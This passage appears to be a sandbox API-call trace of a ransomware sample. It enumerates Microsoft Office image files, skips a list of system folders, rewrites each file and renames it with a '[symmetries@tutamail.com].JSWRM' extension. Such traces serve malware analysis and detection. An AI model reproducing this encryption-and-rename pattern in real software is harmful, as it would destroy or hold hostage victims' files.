ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x77f, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinWordLogoSmall.contrast-black_scale-100.png", cAlternateFileName="WI2520~1.PNG")) returned 1 [0134.500] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-100.png", lpString2=".") returned 1 [0134.500] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-100.png", lpString2="..") returned 1 [0134.500] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-100.png", lpString2="...") returned 1 [0134.500] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-100.png", lpString2="windows") returned 1 [0134.500] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-100.png", lpString2="recovery") returned 1 [0134.500] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-100.png", lpString2="perflogs") returned 1 [0134.500] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-100.png", lpString2="documents and settings") returned 1 [0134.500] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0134.500] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-100.png", lpString2="system volume information") returned 1 [0134.500] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-100.png", lpString2="msocache") returned 1 [0134.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0134.500] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-black_scale-100.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0134.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0134.500] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-black_scale-100.png", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogoSmall.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 45 [0134.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0134.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0134.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-black_scale-100.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0134.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0134.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-black_scale-100.png", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogoSmall.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 45 [0134.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0134.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0134.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0134.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0134.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.contrast-black_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.502] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1919) returned 1 [0134.502] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x770) returned 0x20c6c0 [0134.502] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x770, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x770, lpOverlapped=0x0) returned 1 [0134.510] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.510] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x770, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x770, lpOverlapped=0x0) returned 1 [0134.510] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0134.510] CloseHandle (hObject=0x238) returned 1 [0134.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0134.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0134.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0134.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0134.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0134.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0134.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0134.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0134.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0134.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0134.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b480 [0134.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0134.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b480 | out: hHeap=0x1e0000) returned 1 [0134.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0134.511] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.contrast-black_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.contrast-black_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.contrast-black_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0134.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0134.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0134.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0134.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0134.513] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a8a15c5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a8a15c5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a8c7801, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x82a, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinWordLogoSmall.contrast-black_scale-140.png", cAlternateFileName="WIA801~1.PNG")) returned 1 [0134.513] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-140.png", lpString2=".") returned 1 [0134.513] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-140.png", lpString2="..") returned 1 [0134.513] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-140.png", lpString2="...") returned 1 [0134.513] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-140.png", lpString2="windows") returned 1 [0134.513] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-140.png", lpString2="recovery") returned 1 [0134.513] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-140.png", lpString2="perflogs") returned 1 [0134.513] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-140.png", lpString2="documents and settings") returned 1 [0134.513] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0134.513] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-140.png", lpString2="system volume information") returned 1 [0134.513] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-140.png", lpString2="msocache") returned 1 [0134.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0134.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-black_scale-140.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0134.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0134.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-black_scale-140.png", cchWideChar=45, lpMultiByteStr=0x22d0d8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogoSmall.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 45 [0134.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0134.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0134.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-black_scale-140.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0134.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0134.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-black_scale-140.png", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogoSmall.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 45 [0134.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0134.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0134.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0134.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0134.514] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.contrast-black_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.514] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2090) returned 1 [0134.514] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x820) returned 0x20c6c0 [0134.515] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x820, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x820, lpOverlapped=0x0) returned 1 [0134.523] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.523] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x820, lpOverlapped=0x0) returned 1 [0134.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0134.523] CloseHandle (hObject=0x238) returned 1 [0134.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0134.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0134.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0134.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0134.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0134.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0134.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0134.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0134.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0134.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0134.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0134.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0134.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0134.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0134.524] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.contrast-black_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.contrast-black_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.contrast-black_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0134.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0134.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0134.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0134.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0134.525] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a8a15c5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a8a15c5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a8c7801, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8fb, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinWordLogoSmall.contrast-black_scale-180.png", cAlternateFileName="WIF595~1.PNG")) returned 1 [0134.525] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-180.png", lpString2=".") returned 1 [0134.525] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-180.png", lpString2="..") returned 1 [0134.525] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-180.png", lpString2="...") returned 1 [0134.525] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-180.png", lpString2="windows") returned 1 [0134.525] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-180.png", lpString2="recovery") returned 1 [0134.525] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-180.png", lpString2="perflogs") returned 1 [0134.525] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-180.png", lpString2="documents and settings") returned 1 [0134.525] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0134.525] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-180.png", lpString2="system volume information") returned 1 [0134.525] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-180.png", lpString2="msocache") returned 1 [0134.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0134.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-black_scale-180.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0134.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0134.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-black_scale-180.png", cchWideChar=45, lpMultiByteStr=0x22d0d8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogoSmall.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 45 [0134.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0134.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0134.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-black_scale-180.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0134.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0134.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-black_scale-180.png", cchWideChar=45, lpMultiByteStr=0x22ce70, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogoSmall.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 45 [0134.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0134.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0134.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0134.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0134.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.contrast-black_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.526] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2299) returned 1 [0134.526] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8f0) returned 0x20c6c0 [0134.526] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8f0, lpOverlapped=0x0) returned 1 [0134.528] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.528] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8f0, lpOverlapped=0x0) returned 1 [0134.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0134.528] CloseHandle (hObject=0x238) returned 1 [0134.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0134.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0134.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0134.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0134.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0134.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0134.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0134.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0134.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0134.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0134.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0134.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0134.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0134.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0134.529] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.contrast-black_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.contrast-black_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.contrast-black_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: 